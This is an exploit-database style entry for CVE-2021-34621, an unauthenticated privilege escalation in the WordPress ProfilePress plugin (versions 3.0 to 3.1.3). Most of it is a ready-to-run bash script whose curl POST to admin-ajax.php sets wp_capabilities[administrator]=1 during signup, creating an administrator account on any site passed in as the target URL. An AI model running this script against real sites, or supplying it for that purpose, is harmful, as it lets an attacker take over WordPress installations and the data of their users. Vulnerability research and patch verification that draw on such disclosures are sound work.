WordPress ProfilePress 3.1.3 Privilege Escalation

WordPress ProfilePress plugin version 3.1.3 suffers from a privilege escalation vulnerability.


MD5 | c4cba1b662e47bbd7666c34248829680

# Exploit Title: WordPress Plugin ProfilePress 3.1.3 - Privilege Escalation (Unauthenticated)
# Date: 23-08-2021
# Exploit Author: Numan Rajkotiya
# Vendor Homepage: https://profilepress.net/
# Software Link: https://downloads.wordpress.org/plugin/wp-user-avatar.3.0.zip
# Version: [1] ProfilePress (Formerly WP User Avatar) 3.0 - 3.13
[2] WordPress 4.7 or higher
# Tested on: ProfilePress 3.0, Apache 2.4, and Windows Build 19043.928
# CVE : CVE-2021-34621

#!/bin/bash

# Exploit for WordPress Plugin ProfilePress 3.0 - 3.1.3
# Change the name and password as per your requirement.

URL=$1

curl -X POST $URL"/wp-admin/admin-ajax.php" \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "reg_username=numan" \
-d "[email protected]" \
-d "reg_password=numan" \
-d "reg_password_present=true" \
-d "wp_capabilities[administrator]=1" \
-d "reg_first_name=pwned" \
-d "reg_last_name=numan" \
-d "action=pp_ajax_signup"

Related Posts